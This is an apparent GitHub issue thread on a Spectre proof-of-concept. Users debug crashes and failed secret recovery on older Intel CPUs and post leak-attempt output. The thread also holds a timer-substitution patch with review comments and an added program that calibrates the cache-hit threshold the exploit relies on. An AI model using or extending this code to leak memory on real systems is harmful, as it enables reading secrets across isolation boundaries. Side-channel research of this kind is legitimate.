
illegal hardware instruction #6

Open
kopr12 opened this issue Jan 5, 2018 · 9 comments

Comments


kopr12 commented Jan 5, 2018

Getting this error running it on Linux on a dual-core CPU:

Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
illegal hardware instruction
$ cat /proc/cpuinfo
..
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Pentium(R) Dual  CPU  E2180  @ 2.00GHz
..
Eugnis (Owner) commented Jan 5, 2018

Hello. Try this implementation with pthread.h: https://gist.github.com/Eugnis/3ba3f048988e7be76737ab87da64bb26
Compile and run with: gcc -std=c99 -march=native -pthread -O0 spectre-thread.c -o spectre && ./spectre

kopr12 (Author) commented Jan 5, 2018

Thank you, this one works.

I don't know if the result is good, though; I mean the message isn't recovered, so that's good, but now I wonder why.

CACHE_HIT_THRESHOLD = 40
MAX_TRIES = 2500

Size of secret is 41
Size of recovered_secret is 41

 Original secret: 'The Magic Words are Squeamish Ossifrage.'
Recovered secret: ''

Reading 40 bytes:
Reading at malicious_x = 0xa0... Unclear: 0xB4='?' score=2492 ('?|?' second: 0x0D='?' score=2274)
Reading at malicious_x = 0xa1... Unclear: 0xB4='?' score=2477 ('?|?' second: 0x0D='?' score=2239)
Reading at malicious_x = 0xa2... Unclear: 0xB4='?' score=2485 ('?|?' second: 0x9D='?' score=2261)
Reading at malicious_x = 0xa3... Unclear: 0xB4='?' score=2477 ('?|?' second: 0x9D='?' score=2242)
Reading at malicious_x = 0xa4... Unclear: 0xB4='?' score=2482 ('?|?' second: 0x0D='?' score=2221)
Reading at malicious_x = 0xa5... Unclear: 0xB4='?' score=2479 ('?|?' second: 0x9D='?' score=2262)
Reading at malicious_x = 0xa6... Unclear: 0xB4='?' score=2472 ('?|?' second: 0x9D='?' score=2240)
Reading at malicious_x = 0xa7... Unclear: 0xB4='?' score=2484 ('?|?' second: 0x9D='?' score=2258)
Reading at malicious_x = 0xa8... Unclear: 0xB4='?' score=2478 ('?|?' second: 0x9D='?' score=2306)
Reading at malicious_x = 0xa9... Unclear: 0xB4='?' score=2479 ('?|?' second: 0x0D='?' score=2251)
Reading at malicious_x = 0xaa... Unclear: 0xB4='?' score=2478 ('?|?' second: 0x9D='?' score=2254)
Reading at malicious_x = 0xab... Unclear: 0xB4='?' score=2480 ('?|?' second: 0x9D='?' score=2229)
Reading at malicious_x = 0xac... Unclear: 0xB4='?' score=2481 ('?|?' second: 0x9D='?' score=2240)
Reading at malicious_x = 0xad... Unclear: 0xB4='?' score=2476 ('?|?' second: 0x9D='?' score=2249)
Reading at malicious_x = 0xae... Unclear: 0xB4='?' score=2473 ('?|?' second: 0x0D='?' score=2247)
Reading at malicious_x = 0xaf... Unclear: 0xB4='?' score=2479 ('?|?' second: 0x9D='?' score=2244)
Reading at malicious_x = 0xb0... Unclear: 0xB4='?' score=2478 ('?|?' second: 0x0D='?' score=2241)
Reading at malicious_x = 0xb1... Unclear: 0xB4='?' score=2470 ('?|?' second: 0x0D='?' score=2240)
Reading at malicious_x = 0xb2... Unclear: 0xB4='?' score=2477 ('?|?' second: 0x0D='?' score=2246)
Reading at malicious_x = 0xb3... Unclear: 0xB4='?' score=2480 ('?|?' second: 0x0D='?' score=2221)
Reading at malicious_x = 0xb4... Unclear: 0xB4='?' score=2482 ('?|?' second: 0x0D='?' score=2256)
Reading at malicious_x = 0xb5... Unclear: 0xB4='?' score=2477 ('?|?' second: 0x9D='?' score=2264)
Reading at malicious_x = 0xb6... Unclear: 0xB4='?' score=2481 ('?|?' second: 0x9D='?' score=2241)
Reading at malicious_x = 0xb7... Unclear: 0xB4='?' score=2471 ('?|?' second: 0x9D='?' score=2248)
Reading at malicious_x = 0xb8... Unclear: 0xB4='?' score=2482 ('?|?' second: 0x0D='?' score=2233)
Reading at malicious_x = 0xb9... Unclear: 0xB4='?' score=2486 ('?|?' second: 0x9D='?' score=2262)
Reading at malicious_x = 0xba... Unclear: 0xB4='?' score=2486 ('?|?' second: 0x9D='?' score=2282)
Reading at malicious_x = 0xbb... Unclear: 0xB4='?' score=2480 ('?|?' second: 0x9D='?' score=2248)
Reading at malicious_x = 0xbc... Unclear: 0xB4='?' score=2482 ('?|?' second: 0x0D='?' score=2236)
Reading at malicious_x = 0xbd... Unclear: 0xB4='?' score=2473 ('?|?' second: 0x9D='?' score=2255)
Reading at malicious_x = 0xbe... Unclear: 0xB4='?' score=2472 ('?|?' second: 0x9D='?' score=2245)
Reading at malicious_x = 0xbf... Unclear: 0xB4='?' score=2471 ('?|?' second: 0x0D='?' score=2244)
Reading at malicious_x = 0xc0... Unclear: 0xB4='?' score=2485 ('?|?' second: 0x9D='?' score=2222)
Reading at malicious_x = 0xc1... Unclear: 0xB4='?' score=2481 ('?|?' second: 0x9D='?' score=2240)
Reading at malicious_x = 0xc2... Unclear: 0xB4='?' score=2478 ('?|?' second: 0x0D='?' score=2243)
Reading at malicious_x = 0xc3... Unclear: 0xB4='?' score=2479 ('?|?' second: 0x9D='?' score=2271)
Reading at malicious_x = 0xc4... Unclear: 0xB4='?' score=2475 ('?|?' second: 0x0D='?' score=2244)
Reading at malicious_x = 0xc5... Unclear: 0xB4='?' score=2478 ('?|?' second: 0x0D='?' score=2238)
Reading at malicious_x = 0xc6... Unclear: 0xB4='?' score=2482 ('?|?' second: 0x0D='?' score=2233)
Reading at malicious_x = 0xc7... Unclear: 0xB4='?' score=2479 ('?|?' second: 0x9D='?' score=2251)
counter thread finished

 Original secret: 'The Magic Words are Squeamish Ossifrage.'
Recovered secret: '????????????????????????????????????????'

Eugnis (Owner) commented Jan 5, 2018

Try changing the CACHE_HIT_THRESHOLD value on line 29. While a value of 80 appears to work for most desktop CPUs, a larger value may be required for slower CPUs.

Btw, the Intel(R) Pentium(R) Dual CPU E2180 may not be affected; it's not present in Intel's list of affected CPUs.

kopr12 (Author) commented Jan 5, 2018

I tried several different values, and it produced some chars instead of '?', but I was not able to get the original message. I'll try later to run it in some kind of loop which would change the threshold automatically.

Maybe Core 2 isn't affected, but AFAIK all CPUs are affected by Spectre.

Meltdown:

More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013).

Spectre:

Spectre, on the other hand, appears to have a much wider reach. According to researchers, nearly every type of device is affected by Spectre; it has been verified to work across Intel, AMD, and ARM processors. Spectre is harder to exploit than Meltdown, but researchers caution that it is also harder to guard against.

https://www.windowscentral.com/all-modern-processors-impacted-new-meltdown-and-spectre-exploits

pali commented Jan 7, 2018

Here is an alternative patch for machines which do not have the rdtscp instruction and crash with an illegal hardware instruction:

diff --git a/Source.c b/Source.c
index ad95166..4fb7918 100644
--- a/Source.c
+++ b/Source.c
@@ -8,6 +8,10 @@
 #include <x86intrin.h> /* for rdtscp and clflush */
 #endif
 
+#ifndef HAVE_RDTSCP
+#define HAVE_RDTSCP 1
+#endif
+
 /* sscanf_s only works in MSVC. sscanf should work with other compilers*/
 #ifndef _MSC_VER
 #define sscanf_s sscanf
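Review bot: HAVE_RDTSCP defaults to 1, so an unmodified build (plain `gcc ... Source.c`) still compiles the `__rdtscp` path and still dies with the illegal instruction this issue is about; the new block should say that these machines need `-DHAVE_RDTSCP=0` on the command line, or better, drop the build flag and decide at runtime (rdtscp support is CPUID.80000001H:EDX bit 27, readable with `__get_cpuid` from <cpuid.h>) so the same binary works on both kinds of CPU.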
@@ -81,9 +85,16 @@ void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
 		{
 			mix_i = ((i * 167) + 13) & 255;
 			addr = &array2[mix_i * 512];
+#if HAVE_RDTSCP
 			time1 = __rdtscp(&junk); /* READ TIMER */
 			junk = *addr; /* MEMORY ACCESS TO TIME */
 			time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+#else
+			time1 = __rdtsc(); /* READ TIMER */
+			junk = *addr; /* MEMORY ACCESS TO TIME */
+			_mm_mfence();
+			time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+#endif
 			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
 				results[mix_i]++; /* cache hit - add +1 to score for this value */
 		}
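Review bot: in the `#else` branch the fence covers only one side of the timed load. Nothing stops `junk = *addr` from being issued before the first `__rdtsc()` (rdtsc is not serializing), and `_mm_mfence()` orders memory operations only, so the second `__rdtsc()` can still execute before the load has completed. The pattern Intel documents for this is an lfence on each side of the first read and one before the second, e.g. `_mm_lfence(); time1 = __rdtsc(); _mm_lfence();` ... `_mm_lfence(); time2 = __rdtsc() - time1;`. Whichever fence is used, its cost is counted into `time2`, so `CACHE_HIT_THRESHOLD` has to be re-tuned for this path; the reports later in this thread of `?`-only output once `_mm_mfence` is in place are consistent with that.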

rdtsc is also used by the Meltdown attack example.

kopr12 (Author) commented Jan 7, 2018

Your patch has some problems applying, but simply replacing rdtscp(&junk) with rdtsc() works indeed. I'll leave this open, and @Eugnis can close it if he decides to implement this, or whenever.

Edit: Actually it doesn't always work; I mean the program runs, but I only once got the original message, other times I got random chars.

pali commented Jan 7, 2018

> Your patch have some problems to apply

Make sure you handle CRLF and LF correctly.

> simply replacing rdtscp(&junk) with rdtsc() works

Do not forget _mm_mfence or some other synchronization instruction (e.g. cpuid), as rdtsc can be executed out of order, e.g. prior to junk = *addr. rdtscp is the "safe" variant of rdtsc.

kopr12 (Author) commented Jan 7, 2018

With _mm_mfence I get worse results, usually it's just '?'; commenting that line out produces some chars of the original message.

Btw, the Meltdown attack example works fine on Core 2 CPUs.
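The two threads of this discussion, a timer for CPUs without rdtscp and the right value of CACHE_HIT_THRESHOLD, can be handled in one small program. What follows is an added example written for this page; it is not code from the Spectre-Attack PoC, from the patch above, or from the pthread gist linked earlier (which takes a different route, a counter thread). It detects rdtscp at runtime through CPUID instead of a build flag, brackets the counter read with lfence rather than mfence (lfence waits for earlier instructions to complete without draining the store buffer, which is why it costs less in the measured time), and then measures cached versus flushed load latency on the local machine to derive a threshold instead of trying values by hand. CACHE_HIT_THRESHOLD is the PoC's name; every function and type name here (have_rdtscp, fenced_ts, probe_cycles, choose_threshold, calibrate, calib_t) is the editor's own, and the file name in the build line is hypothetical: gcc -O2 -std=gnu99 calib.c -o calib

```c
/* Editor's added example, not code from the Spectre-Attack PoC: choose a timer
 * that works without rdtscp and measure CACHE_HIT_THRESHOLD instead of guessing
 * it. CACHE_HIT_THRESHOLD is the PoC's name; all other names are the editor's. */
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h> /* __rdtsc, __rdtscp, _mm_lfence, _mm_mfence, _mm_clflush */
#include <cpuid.h>     /* __get_cpuid */
#define HAVE_X86 1
#else
#define HAVE_X86 0     /* no cycle counter: calibrate() will report failure */
#endif

/* rdtscp support is advertised in CPUID.80000001H:EDX bit 27. */
int have_rdtscp(void)
{
#if HAVE_X86
    unsigned int a, b, c, d;
    if (__get_cpuid(0x80000001u, &a, &b, &c, &d))
        return (int)((d >> 27) & 1u);
#endif
    return 0;
}

#if HAVE_X86
/* Counter read bracketed by lfence: the one before waits for earlier
 * instructions (the timed load, on the second read), the one after keeps
 * later instructions (the timed load, on the first read) from starting early.
 * rdtscp already waits for earlier instructions; both timers get the same
 * wrapper so their overhead is comparable. */
static inline uint64_t fenced_ts(int use_rdtscp)
{
    unsigned int aux;
    uint64_t t;
    _mm_lfence();
    t = use_rdtscp ? __rdtscp(&aux) : __rdtsc();
    _mm_lfence();
    return t;
}
#endif

/* Cycles for one load of *p, fences included (0 where we cannot measure). */
uint64_t probe_cycles(const uint8_t *p, int use_rdtscp)
{
#if HAVE_X86
    uint64_t t0 = fenced_ts(use_rdtscp);
    uint8_t v = *(const volatile uint8_t *)p; (void)v; /* the timed access */
    return fenced_ts(use_rdtscp) - t0;
#else
    (void)p; (void)use_rdtscp;
    return 0;
#endif
}

/* Midpoint between average hit and miss latency, or -1 if they overlap. */
int choose_threshold(uint64_t hit_avg, uint64_t miss_avg)
{
    if (miss_avg <= hit_avg)
        return -1;
    return (int)(hit_avg + (miss_avg - hit_avg) / 2);
}

typedef struct {
    int use_rdtscp;    /* which timer was used */
    uint64_t hit_avg;  /* average cycles for a cached load */
    uint64_t miss_avg; /* average cycles for a load right after clflush */
    int threshold;     /* suggested CACHE_HIT_THRESHOLD, or -1 */
} calib_t;

/* Time `rounds` cached and flushed loads on a private buffer; 0 on success,
 * -1 if hits and misses are not separable. */
int calibrate(calib_t *c, int rounds)
{
    static uint8_t buf[64 * 64] __attribute__((aligned(64)));
    uint64_t hit = 0, miss = 0;
    if (rounds <= 0) return -1;
    c->use_rdtscp = have_rdtscp();
    for (int i = 0; i < rounds; i++) {
        uint8_t *line = buf + 64 * (i % 64);     /* one cache line per round */
        (void)probe_cycles(line, c->use_rdtscp); /* bring it into the cache */
        hit += probe_cycles(line, c->use_rdtscp);
#if HAVE_X86
        _mm_clflush(line);
        _mm_mfence();                            /* flush done before re-probe */
#endif
        miss += probe_cycles(line, c->use_rdtscp);
    }
    c->hit_avg = hit / (uint64_t)rounds;
    c->miss_avg = miss / (uint64_t)rounds;
    c->threshold = choose_threshold(c->hit_avg, c->miss_avg);
    return c->threshold < 0 ? -1 : 0;
}

int main(void)
{
    calib_t c;
    if (calibrate(&c, 10000) != 0) { fputs("could not separate hits from misses\n", stderr); return 1; }
    printf("timer %s: hit avg %llu, miss avg %llu -> CACHE_HIT_THRESHOLD %d\n",
           c.use_rdtscp ? "rdtscp" : "rdtsc+lfence",
           (unsigned long long)c.hit_avg, (unsigned long long)c.miss_avg, c.threshold);
    return 0;
}
```

The threshold it prints is only meaningful for a measuring loop built with the same fences, since their cost is inside both averages; if the PoC's loop is changed to the lfence pattern, use the number from this program, and if it keeps the patch's mfence, calibrate with mfence in fenced_ts instead. Averages are easy to skew by interrupts and frequency scaling, so run it pinned to the core the PoC will use (taskset on Linux) and rerun it if the hit and miss averages come out close together.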

WiredLife commented

On my Core2Quads I don't get letters from the stored string.
